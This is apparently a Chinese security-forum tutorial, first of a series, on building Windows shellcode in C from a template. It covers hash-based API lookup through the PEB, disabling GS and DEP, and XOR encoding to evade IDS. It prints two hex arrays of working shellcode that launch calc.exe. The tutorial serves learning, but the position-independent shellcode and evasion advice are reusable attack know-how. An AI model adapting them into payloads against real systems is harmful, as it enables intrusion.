[shellcode框架(二)] 完善shellcode框架
https://bbs.pediy.com/thread-216661.htm
[shellcode框架(三)] 修复shellcode框架的小bug
https://bbs.pediy.com/thread-216673.htm
[shellcode框架(四)] shellcode编程小技巧
https://bbs.pediy.com/thread-216674.htm
[shellcode框架(五)] 多文件shellcode框架
https://bbs.pediy.com/thread-217040.htm
倾其所学,做此系列,希望初入此道者,莫走弯路 。
认识shellcode
Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。 Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数以万计带着漏洞顽强运行着的服务器给hacker和Vxer丰盛的晚餐。漏洞利用中最关键的是Shellcode的编写。由于漏洞发现者在漏洞发现之初并不会给出完整Shellcode,因此掌握Shellcode编写技术就显得尤为重要。(来自百科 http://baike.baidu.com/link?url=3YqpOe7gRddlo6xMoMwEYhtprTNBTtWdvNTuaVq5Xo8Nucd9Kb7DZj1_GmWX1DGb8MN2iGIiJ6jIBgsOKbLnJD58lp0m0_PECdGTXPXSqgW)
shellcode编写考虑因素
⒈Shellcode的编写语言。
⒋Shellcode编码问题。
⒌多态技术躲避IDS检测。
这些问题是百科上提出的,这也正是shellcode开发要解决的问题。其实还有很多问题要解决,这里我先不一一列举,在以后的开发中很多问题就会暴露出来,到时我们再来探讨暴露的问题,这样记忆更深刻。
这里我就此系列来简单的回答以上问题:
1. 语言,这里我们用c语言,开发环境使用vs(10),部分代码使用汇编内联到代码中(如,获取TEP、PEB特殊地址),c语言开发简单易懂,大大降低了入门的门槛;移植性好,配合vs做简单修改后可以直接生成arm、x64的shellcode ;vs的强大调试功能可以帮助我们发现其中的bug,从此告别OD。
2.重定位。
3.API地址定位,这里我们使用最流行的通过比对函数名hash来查找函数地址。其工作原理是将函数名计算成hash(DWORD),当遍历dll导出表时,将函数名先计算为hash再和shellcode中存放的hash比较来确定API,从而找到其地址。这里不直接在shellcode中存放函数名是为了减小shellcode的体积。
4.编码问题。
5. 躲避IDS检测,我们随便加上异或编码、解码功能、解压缩、加解密等等 就可以产生千差万别的shellcode;总有一款适合你。
部署shellcode c语言框架
这里我直接使用 TK教主的shellcode模板 https://github.com/tombkeeper/Shellcode_Template_in_C
下载解压后一共3个文件shellcode.c gethash.c str2intarr.c ;其中shellcode.c就是这个模板了,以后所有的工嗯那个都在这个基础上增加;gethash.c 将使用的函数名计算得到hash值,以供利用hash获取函数地址;str2intarr.c 这个主要是将字符串资源直接嵌入到shellcode中,以供shellcode使用(一般开发字符串资源会被编译器放在资源中打包如PE文件,而我们的shellcode不能将字符串放在其他地方,而必须存放在shellcode的空间内,以保证shellcode能准确的获取字符串地址)。
部署shellcode.c
1.打开vs10,新建工程->选择 "visual c++" ->Win32 -> Win32 Console Application ;名称随意;Application options 选择 Empty project(空工程)。
2.将shellcode.c放在工程目录下,将shellcode.c拖入新工程。
3.右键shellcode.c文件 属性-> c/c++ -> Precompiled Headers(预编译头)->Percompliled Header(预编译头):选择 “Not Using Pricomplied Headers" ;因为shellcode.c是c文件所以不使用预编译头
4. 将工程设置为release模式 ;并将工程属性 c/c++ -> Optimization(优化)->Optimization(优化):选择为disabled 或 Minimize Size(/O1) (当调试使用disabled ;发布shellcode时使用O1)
5. 将 void __declspec(naked) StartSign (){} 注释掉
6. 将shellcode.c文件中的main函数改为如下
7. 关闭GS、 关闭DEP、
void main(void)
{
DWORD ShellCodeSize;
ShellCodeSize = (DWORD)EndSign - (DWORD)StartSign;
ShellCodeToHex ( (BYTE *)ShellCode, ShellCodeSize, stdout );
// ShellCode();
}
// 修改后
void main(void)
{
DWORD ShellCodeSize;
ShellCodeSize = (DWORD)EndSign - (DWORD)ShellCode;
ShellCodeToHex ( (BYTE *)ShellCode, ShellCodeSize, stdout );
getchar();
ShellCode();
}
这样就可以运行shellcode工程了。
在cmd下运行shellcode.exe还可以看到输出的shellcode 十六进制数组。
直接运行就能弹出 calc.exe了吧!
BYTE ShellCode[] = {
0x55,0x8B,0xEC,0x83,0xEC,0x14,0xC7,0x45,0xF8,0x63,0x61,0x6C,0x63,0xC7,0x45,0xFC,
0x00,0x00,0x00,0x00,0xE8,0x67,0x00,0x00,0x00,0x89,0x45,0xEC,0x68,0xB9,0x6B,0xFF,
0xCB,0x8B,0x45,0xEC,0x50,0xE8,0x06,0x01,0x00,0x00,0x83,0xC4,0x08,0x89,0x45,0xF4,
0x68,0x13,0xB9,0xE6,0x25,0x8B,0x4D,0xEC,0x51,0xE8,0xF2,0x00,0x00,0x00,0x83,0xC4,
0x08,0x89,0x45,0xF0,0x6A,0x01,0x8D,0x55,0xF8,0x52,0xFF,0x55,0xF0,0x6A,0x00,0xFF,
0x55,0xF4,0x8B,0xE5,0x5D,0xC3,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,
0x55,0x8B,0xEC,0x64,0xA1,0x18,0x00,0x00,0x00,0x5D,0xC3,0xCC,0xCC,0xCC,0xCC,0xCC,
0x55,0x8B,0xEC,0xE8,0xE8,0xFF,0xFF,0xFF,0x8B,0x40,0x30,0x5D,0xC3,0xCC,0xCC,0xCC,
0x55,0x8B,0xEC,0x83,0xEC,0x10,0xE8,0xE5,0xFF,0xFF,0xFF,0x89,0x45,0xF4,0x8B,0x45,
0xF4,0x8B,0x48,0x0C,0x8B,0x51,0x1C,0x89,0x55,0xF8,0xC7,0x45,0xFC,0x00,0x00,0x00,
0x00,0xEB,0x09,0x8B,0x45,0xFC,0x83,0xC0,0x01,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x02,
0x7D,0x26,0x8B,0x4D,0xF8,0x8B,0x11,0x83,0xEA,0x10,0x89,0x55,0xF0,0x8B,0x45,0xF0,
0x8B,0x48,0x30,0x0F,0xB7,0x51,0x10,0x83,0xFA,0x2E,0x75,0x02,0xEB,0x0A,0x8B,0x45,
0xF8,0x8B,0x08,0x89,0x4D,0xF8,0xEB,0xCB,0x8B,0x55,0xF0,0x8B,0x42,0x18,0x8B,0xE5,
0x5D,0xC3,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,
0x55,0x8B,0xEC,0x51,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0x0F,0xBE,
0x08,0x85,0xC9,0x74,0x1F,0x8B,0x55,0xFC,0xC1,0xE2,0x05,0x03,0x55,0xFC,0x8B,0x45,
0x08,0x0F,0xBE,0x08,0x03,0xD1,0x89,0x55,0xFC,0x8B,0x55,0x08,0x83,0xC2,0x01,0x89,
0x55,0x08,0xEB,0xD7,0x8B,0x45,0xFC,0x8B,0xE5,0x5D,0xC3,0xCC,0xCC,0xCC,0xCC,0xCC,
0x55,0x8B,0xEC,0x83,0xEC,0x24,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,
0x89,0x45,0xFC,0x8B,0x4D,0xFC,0x8B,0x55,0x08,0x03,0x51,0x3C,0x89,0x55,0xE4,0x8B,
0x45,0xE4,0x8B,0x4D,0x08,0x03,0x48,0x78,0x89,0x4D,0xF0,0x8B,0x55,0xF0,0x8B,0x45,
0x08,0x03,0x42,0x20,0x89,0x45,0xF4,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xEB,0x09,
0x8B,0x4D,0xF8,0x83,0xC1,0x01,0x89,0x4D,0xF8,0x8B,0x55,0xF0,0x8B,0x45,0xF8,0x3B,
0x42,0x18,0x73,0x30,0x8B,0x4D,0xF4,0x8B,0x55,0x08,0x03,0x11,0x89,0x55,0xE0,0x8B,
0x45,0xE0,0x50,0xE8,0x58,0xFF,0xFF,0xFF,0x83,0xC4,0x04,0x3B,0x45,0x0C,0x75,0x09,
0xC7,0x45,0xE8,0x01,0x00,0x00,0x00,0xEB,0x0B,0x8B,0x4D,0xF4,0x83,0xC1,0x04,0x89,
0x4D,0xF4,0xEB,0xBC,0x83,0x7D,0xE8,0x00,0x74,0x2F,0x8B,0x55,0xF0,0x8B,0x45,0x08,
0x03,0x42,0x24,0x8B,0x4D,0xF8,0x66,0x8B,0x14,0x48,0x66,0x89,0x55,0xDC,0x8B,0x45,
0xF0,0x8B,0x4D,0x08,0x03,0x48,0x1C,0x0F,0xB7,0x55,0xDC,0x8B,0x45,0x08,0x03,0x04,
0x91,0x89,0x45,0xEC,0x8B,0x45,0xEC,0xEB,0x02,0x33,0xC0,0x8B,0xE5,0x5D,0xC3,0xCC
};
DWORD ShellCodeSize = 496;
这是未优化(选项disabled)的输出结果,里面有很多cc;
BYTE ShellCode[] = {
0x55,0x8B,0xEC,0x51,0x51,0x83,0x65,0xFC,0x00,0xC7,0x45,0xF8,0x63,0x61,0x6C,0x63,
0x64,0xA1,0x18,0x00,0x00,0x00,0x8B,0x40,0x30,0x8B,0x40,0x0C,0x8B,0x40,0x1C,0x33,
0xC9,0x8B,0x00,0x8B,0x50,0x20,0x66,0x83,0x7A,0x10,0x2E,0x74,0x06,0x41,0x83,0xF9,
0x02,0x7C,0xEE,0x56,0x57,0x8B,0x78,0x08,0x68,0xB9,0x6B,0xFF,0xCB,0xE8,0x1F,0x00,
0x00,0x00,0x8B,0xF0,0xC7,0x04,0x24,0x13,0xB9,0xE6,0x25,0xE8,0x11,0x00,0x00,0x00,
0x59,0x6A,0x01,0x8D,0x4D,0xF8,0x51,0xFF,0xD0,0x6A,0x00,0xFF,0xD6,0x5F,0x5E,0xC9,
0xC3,0x55,0x8B,0xEC,0x51,0x8B,0x47,0x3C,0x8B,0x44,0x38,0x78,0x83,0x65,0xFC,0x00,
0x53,0x03,0xC7,0x56,0x8B,0x70,0x20,0x03,0xF7,0x83,0x78,0x18,0x00,0x76,0x2A,0x8B,
0x0E,0x03,0xCF,0x33,0xDB,0xEB,0x09,0x6B,0xDB,0x21,0x0F,0xBE,0xD2,0x03,0xDA,0x41,
0x8A,0x11,0x84,0xD2,0x75,0xF1,0x3B,0x5D,0x08,0x74,0x14,0x83,0xC6,0x04,0xFF,0x45,
0xFC,0x8B,0x4D,0xFC,0x3B,0x48,0x18,0x72,0xD6,0x33,0xC0,0x5E,0x5B,0xC9,0xC3,0x8B,
0x48,0x24,0x8B,0x55,0xFC,0x8B,0x40,0x1C,0x8D,0x0C,0x51,0x0F,0xB7,0x0C,0x39,0x8D,
0x04,0x88,0x8B,0x04,0x38,0x03,0xC7,0xEB,0xE2
};
DWORD ShellCodeSize = 201;
优化O1开启后 只有201字节了。
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法